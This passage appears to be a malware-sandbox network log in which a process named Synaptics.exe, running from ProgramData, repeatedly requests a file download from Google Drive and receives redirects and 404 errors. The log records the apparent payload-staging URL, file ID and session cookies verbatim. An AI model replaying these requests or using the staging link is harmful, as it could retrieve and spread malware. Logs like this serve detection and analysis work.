                                                                                                                                                                    Cookie: NID=520=Wx-G4O6EShb7Snmlh2857_NmWBV2T-yG2QsNO31GjRaZavqqR41hWX1_5xCZCTAqdEzAPkLnbI0QV6s9vct8T5LnTe9TZ6tdxigzizMteDlRATYlBvzufdbZXHMvzyCqPyGAByCDy8A5KGUQB0tUVAh6FqkNmYN91BjoYlg65oOdm-I5eyfWK-yZ


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
36 | 192.168.2.4 | 49798 | 142.250.181.238 | 443 | 5780 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 03:59:17 UTC | 345 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Host: docs.google.com
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Cookie: NID=520=Wx-G4O6EShb7Snmlh2857_NmWBV2T-yG2QsNO31GjRaZavqqR41hWX1_5xCZCTAqdEzAPkLnbI0QV6s9vct8T5LnTe9TZ6tdxigzizMteDlRATYlBvzufdbZXHMvzyCqPyGAByCDy8A5KGUQB0tUVAh6FqkNmYN91BjoYlg65oOdm-I5eyfWK-yZ


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
37 | 192.168.2.4 | 49800 | 142.250.186.129 | 443 | 5780 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 03:59:17 UTC | 387 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Cookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
38 | 192.168.2.4 | 49804 | 142.250.181.238 | 443 | 5780 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 03:59:18 UTC | 345 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Host: docs.google.com
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Cookie: NID=520=Wx-G4O6EShb7Snmlh2857_NmWBV2T-yG2QsNO31GjRaZavqqR41hWX1_5xCZCTAqdEzAPkLnbI0QV6s9vct8T5LnTe9TZ6tdxigzizMteDlRATYlBvzufdbZXHMvzyCqPyGAByCDy8A5KGUQB0tUVAh6FqkNmYN91BjoYlg65oOdm-I5eyfWK-yZ
2024-12-30 03:59:19 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                    Date: Mon, 30 Dec 2024 03:59:18 GMT
                                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-wrWyBb_GT-MhI35ObxB9HA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                    Server: ESF
                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                    Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
39 | 192.168.2.4 | 49803 | 142.250.181.238 | 443 | 5780 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 03:59:18 UTC | 345 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Host: docs.google.com
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Cookie: NID=520=Wx-G4O6EShb7Snmlh2857_NmWBV2T-yG2QsNO31GjRaZavqqR41hWX1_5xCZCTAqdEzAPkLnbI0QV6s9vct8T5LnTe9TZ6tdxigzizMteDlRATYlBvzufdbZXHMvzyCqPyGAByCDy8A5KGUQB0tUVAh6FqkNmYN91BjoYlg65oOdm-I5eyfWK-yZ
2024-12-30 03:59:19 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                    Date: Mon, 30 Dec 2024 03:59:18 GMT
                                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-YWOE5GUpgncxSDPWY-vvtg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                    Server: ESF
                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                    Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
40 | 192.168.2.4 | 49812 | 142.250.181.238 | 443 | 5780 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 03:59:19 UTC | 345 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Host: docs.google.com
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Cookie: NID=520=Wx-G4O6EShb7Snmlh2857_NmWBV2T-yG2QsNO31GjRaZavqqR41hWX1_5xCZCTAqdEzAPkLnbI0QV6s9vct8T5LnTe9TZ6tdxigzizMteDlRATYlBvzufdbZXHMvzyCqPyGAByCDy8A5KGUQB0tUVAh6FqkNmYN91BjoYlg65oOdm-I5eyfWK-yZ
2024-12-30 03:59:20 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                    Date: Mon, 30 Dec 2024 03:59:20 GMT
                                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-hNHLgJAu0xhbkczyxUdQoA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                    Server: ESF
                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                    Connection: close


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
41 | 192.168.2.4 | 49814 | 142.250.181.238 | 443 | 5780 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 03:59:19 UTC | 345 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Host: docs.google.com
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Cookie: NID=520=Wx-G4O6EShb7Snmlh2857_NmWBV2T-yG2QsNO31GjRaZavqqR41hWX1_5xCZCTAqdEzAPkLnbI0QV6s9vct8T5LnTe9TZ6tdxigzizMteDlRATYlBvzufdbZXHMvzyCqPyGAByCDy8A5KGUQB0tUVAh6FqkNmYN91BjoYlg65oOdm-I5eyfWK-yZ
                                                                                                                                                                    2024-12-30 03:59:20 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                    Date: Mon, 30 Dec 2024 03:59:20 GMT
                                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-Idlaiwqe0jG9Pw82rqae2Q' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                    Server: ESF
                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                    Connection: close


                                                                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                    42 | 192.168.2.4 | 49811 | 142.250.186.129 | 443 | 5780 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                    2024-12-30 03:59:19 UTC | 387 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Cookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                                                                                                                                                    2024-12-30 03:59:20 UTC | 1243 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                    X-GUploader-UploadID: AFiumC57ASmcY3_x-w6N-6mQTarcIk-hNhj1KDdX-rorBkXaY7PKaOjjoR_QqUX3fcUjHu8p
                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                    Date: Mon, 30 Dec 2024 03:59:20 GMT
                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-0JCCXqvhC6uJApwpKunyPA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                    Content-Length: 1652
                                                                                                                                                                    Server: UploadServer
                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                    Connection: close
                                                                                                                                                                    2024-12-30 03:59:20 UTC | 147 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                                                                    2024-12-30 03:59:20 UTC | 1390 | IN | Data Ascii: t Found)!!1</title><style nonce="oUFvwpx_YZvaU2XWCWVpGA">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                                                                    2024-12-30 03:59:20 UTC | 115 | IN | Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                    43 | 192.168.2.4 | 49813 | 142.250.186.129 | 443 | 5780 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                    2024-12-30 03:59:19 UTC | 387 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Cookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                                                                                                                                                    2024-12-30 03:59:20 UTC | 1243 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                    X-GUploader-UploadID: AFiumC4AfqBtQhPbDtijPiqMfqPf3-ewQKuuRJT4qDXl2kTnRB4conf6QvA6x7XouugRuTP2
                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                    Date: Mon, 30 Dec 2024 03:59:20 GMT
                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-c71R6bbShKLlj3qKxtpGyg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                    Content-Length: 1652
                                                                                                                                                                    Server: UploadServer
                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                    Connection: close
                                                                                                                                                                    2024-12-30 03:59:20 UTC | 147 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
                                                                                                                                                                    2024-12-30 03:59:20 UTC | 1390 | IN | Data Ascii: t Found)!!1</title><style nonce="rPxim9HDxGOzFF7uMXd5cw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
                                                                                                                                                                    2024-12-30 03:59:20 UTC | 115 | IN | Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


                                                                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                    44 | 192.168.2.4 | 49817 | 142.250.181.238 | 443 | 5780 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                    2024-12-30 03:59:20 UTC | 345 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Host: docs.google.com
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Cookie: NID=520=Wx-G4O6EShb7Snmlh2857_NmWBV2T-yG2QsNO31GjRaZavqqR41hWX1_5xCZCTAqdEzAPkLnbI0QV6s9vct8T5LnTe9TZ6tdxigzizMteDlRATYlBvzufdbZXHMvzyCqPyGAByCDy8A5KGUQB0tUVAh6FqkNmYN91BjoYlg65oOdm-I5eyfWK-yZ
                                                                                                                                                                    2024-12-30 03:59:21 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                    Date: Mon, 30 Dec 2024 03:59:21 GMT
                                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-3yqYTVuCgGDEFG9jz69fXA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                    Server: ESF
                                                                                                                                                                    Content-Length: 0
                                                                                                                                                                    X-XSS-Protection: 0
                                                                                                                                                                    X-Frame-Options: SAMEORIGIN
                                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                    Connection: close


                                                                                                                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                                                                                                                    45 | 192.168.2.4 | 49816 | 142.250.186.129 | 443 | 5780 | C:\ProgramData\Synaptics\Synaptics.exe
                                                                                                                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                                                                                                                    2024-12-30 03:59:20 UTC | 387 | OUT | GET /download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Host: drive.usercontent.google.com
                                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                                    Cookie: NID=520=KZ7nPffwmFJuecPBYkTgj9o0Wg5xgIAtkZGmKeFEtVK_yIOnS3dX1hyC5NpZCfv0-4fpm_502tzUk1orbCiQoVAJo9C37QE_3LvtLcfGxAF8D3Oq1XIJNFGrxd4aflTZHQlukipdeVFIxx2i_7ZXQ_0JTnIe_5KuJkGrFW1bhZinXk3YLIXSJ04
                                                                                                                                                                    2024-12-30 03:59:21 UTC | 1243 | IN | HTTP/1.1 404 Not Found
                                                                                                                                                                    X-GUploader-UploadID: AFiumC4XSQo7gzj0xYJu4Wgsca2HKcfHtThZ2A4gPlYiV3c6BZ3NIoJwQyQYr9L9K7zdN5QR
                                                                                                                                                                    Content-Type: text/html; charset=utf-8
                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                    Date: Mon, 30 Dec 2024 03:59:21 GMT
                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-T62Hbi0Abpa532f4bk3vDg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
                                                                                                                                                                    Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*
                                                                                                                                                                    Cross-Origin-Opener-Policy: same-origin
                                                                                                                                                                    Content-Length: 1652
                                                                                                                                                                    Server: UploadServer
                                                                                                                                                                    Alt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000
                                                                                                                                                                    Content-Security-Policy: sandbox allow-scripts
                                                                                                                                                                    Connection: close
2024-12-30 03:59:21 UTC | 147 | IN | Data Ascii: <html lang="en" dir=ltr><meta charset=utf-8><meta name=viewport content="initial-scale=1, minimum-scale=1, width=device-width"><title>Error 404 (No
2024-12-30 03:59:21 UTC | 1390 | IN | Data Ascii: t Found)!!1</title><style nonce="o3r3b3HjZG5QO7bSnGnFqw">*{margin:0;padding:0}html,code{font:15px/22px arial,sans-serif}html{background:#fff;color:#222;padding:15px}body{color:#222;text-align:unset;margin:7% auto 0;max-width:390px;min-height:180px;padding
2024-12-30 03:59:21 UTC | 115 | IN | Data Ascii: >Thats an error.</ins><p>The requested URL was not found on this server. <ins>Thats all we know.</ins></main>


Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
46 | 192.168.2.4 | 49818 | 142.250.181.238 | 443 | 5780 | C:\ProgramData\Synaptics\Synaptics.exe
Timestamp | Bytes transferred | Direction | Data
2024-12-30 03:59:20 UTC | 345 | OUT | GET /uc?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download HTTP/1.1
                                                                                                                                                                    User-Agent: Synaptics.exe
                                                                                                                                                                    Host: docs.google.com
                                                                                                                                                                    Cache-Control: no-cache
                                                                                                                                                                    Cookie: NID=520=Wx-G4O6EShb7Snmlh2857_NmWBV2T-yG2QsNO31GjRaZavqqR41hWX1_5xCZCTAqdEzAPkLnbI0QV6s9vct8T5LnTe9TZ6tdxigzizMteDlRATYlBvzufdbZXHMvzyCqPyGAByCDy8A5KGUQB0tUVAh6FqkNmYN91BjoYlg65oOdm-I5eyfWK-yZ
2024-12-30 03:59:21 UTC | 1314 | IN | HTTP/1.1 303 See Other
                                                                                                                                                                    Content-Type: application/binary
                                                                                                                                                                    Cache-Control: no-cache, no-store, max-age=0, must-revalidate
                                                                                                                                                                    Pragma: no-cache
                                                                                                                                                                    Expires: Mon, 01 Jan 1990 00:00:00 GMT
                                                                                                                                                                    Date: Mon, 30 Dec 2024 03:59:21 GMT
                                                                                                                                                                    Location: https://drive.usercontent.google.com/download?id=0BxsMXGfPIZfSVlVsOGlEVGxuZVk&export=download
                                                                                                                                                                    Strict-Transport-Security: max-age=31536000
                                                                                                                                                                    Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-Version
                                                                                                                                                                    Content-Security-Policy: script-src 'report-sample' 'nonce-UbJd_XBO6yMROtlfrc9_fA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'
                                                                                                                                                                    Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreport
